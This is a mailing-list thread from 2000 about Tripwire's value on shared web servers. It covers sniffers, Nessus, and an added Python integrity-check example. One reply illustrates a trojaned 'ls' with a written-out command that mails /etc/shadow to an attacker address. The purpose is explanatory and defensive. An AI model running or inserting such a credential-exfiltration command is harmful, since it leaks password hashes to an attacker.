
RE: [cobalt-users] tripwire



Actually this is NOT true. You are supposed to define what directories
tripwire monitors. You point it to portions of your server that contain
binary files such as /bin /sbin/ /usr this is where a hacker is going to do
things, not in a users web directory so the fact that those directories
change won't affect tripwire. 

> packet sniffing programs like ISS or what my business partner uses
> Sessionwall-3
This only helps to attempt to track down a user. For example, the BIND hack
allows someone to gain a root shell via port 53, so as far as your sniffer
goes, it will probably just see DNS traffic. At least if you run tripwire,
should a hacker modify binaries on your machine, tripwire will notice the
fact that the command "ls" has been modified to do this:

cat /etc/shadow |mail haxor@xxxxxxxxxx
ls
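As an added illustration of the point above (not code from Tripwire or from anyone on this list), a minimal integrity check in Python: it fingerprints the binary trees, prunes the customers' web directories the way a policy would, and reports a tampered `ls` while ignoring a changed web page. All paths are constructed under a temporary directory.

```python
"""Minimal Tripwire-style integrity check (added example, not Tripwire's own code):
baseline the binary trees a policy would cover and skip the users' web trees."""
import hashlib
import os
import tempfile
from pathlib import Path


def fingerprint(path):
    """SHA-256 of the content plus the mode bits, so a chmod shows up too."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return "%s:%o" % (h.hexdigest(), os.lstat(path).st_mode)


def build_baseline(roots, excludes=()):
    """Map each regular file under roots (outside excludes) to its fingerprint."""
    baseline = {}
    for root in roots:
        for dirpath, dirnames, filenames in os.walk(root):
            # prune excluded subtrees, e.g. the hosting customers' web directories
            dirnames[:] = [d for d in dirnames
                           if not os.path.join(dirpath, d).startswith(tuple(excludes))]
            for name in filenames:
                p = os.path.join(dirpath, name)
                if os.path.isfile(p) and not os.path.islink(p):
                    baseline[p] = fingerprint(p)
    return baseline


def compare(old, new):
    """Return (modified, added, removed) as sorted path lists."""
    modified = sorted(p for p in old if p in new and old[p] != new[p])
    return modified, sorted(set(new) - set(old)), sorted(set(old) - set(new))


def demo():
    """Constructed scenario under a tmpdir: a tampered bin/ls is reported, a changed web page is not."""
    top = tempfile.mkdtemp()
    bindir, webdir = os.path.join(top, "bin"), os.path.join(top, "home", "site1", "web")
    os.makedirs(bindir); os.makedirs(webdir)
    ls, page = os.path.join(bindir, "ls"), os.path.join(webdir, "index.html")
    Path(ls).write_text("#!/bin/sh\nexec /bin/ls.real \"$@\"\n")
    Path(page).write_text("<h1>site 1</h1>\n")
    excl = [os.path.join(top, "home")]
    base = build_baseline([top], excl)
    Path(ls).write_text(Path(ls).read_text() + "# tampered\n")  # binary change: reported
    Path(page).write_text("<h1>site 1 v2</h1>\n")  # web content change: ignored
    return compare(base, build_baseline([top], excl))
```

Run `demo()` to get `(modified, added, removed)`; only the `bin/ls` path appears, in `modified`.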



-----Original Message-----
From: Geoff King [mailto:geoff@xxxxxxxxxx]
Sent: Thursday, March 02, 2000 7:31 PM
To: cobalt-users@xxxxxxxxxxxxxxx
Subject: Re: [cobalt-users] tripwire


Gary,

    I have installed Tripwire on a RedHat Linux v5.2 box.

    Basically, it's considerably useless on a server that many people use
because it monitors changes in files, which on a hosting web server change
quite often.

    I have found the best means of monitoring hackers is to obtain a stand
alone server and use packet sniffing programs like ISS or what my business
partner uses Sessionwall-3.  There's a bunch more out there, I can't think
of their names off the top of my head.

    I thought it was kind of a moot point for Tripwire as you'd only know
after the hacker gained access and modified files.  It's much better
watching the knock at the door first.

    Now, if the server is not used for many things, such as a secondary DNS
server, and that's it.  Tripwire would be a fairly decent tool in that you'd
definitely know if someone was on there and messing with files that should
never be changed or modified.

    The other thing to do is hack your network yourself.  I run Nessus which
is an open-source security scanner about once every 6 months to see what it
can do.  It's a good idea to pay attention to the security announcements.
Any administrator should know exactly where someone can break into their
network.  Also, an administrator should be able to notice odd or different
behavior of servers and the network fairly quickly.

    Anyways, that's my 2 cents worth on tripwire.  Good tool, for specific
purposes.  Don't ignore it, but don't count on it either.

Geoff

----- Original Message -----
From: "RHLinux" <rhlinux@xxxxxxxxxxx>
To: "Cobalt-Users@xxxxxxxxxxxxxxx" <cobalt-users@xxxxxxxxxxxxxxx>
Sent: Thursday, March 02, 2000 2:55 AM
Subject: [cobalt-users] tripwire


> has anyone tried installing tripwire on a raq2-3?
>
> it's supposed to help in tracking would-be attackers etc...
>
> http://www.zdnet.com/zdnn/stories/news/0,4586,2453339,00.html
>
> Gary
>
>
> _______________________________________________
> cobalt-users mailing list
> cobalt-users@xxxxxxxxxxxxxxx
> To Subscribe or Unsubscribe, please go to:
> http://list.cobalt.com/mailman/listinfo/cobalt-users
>

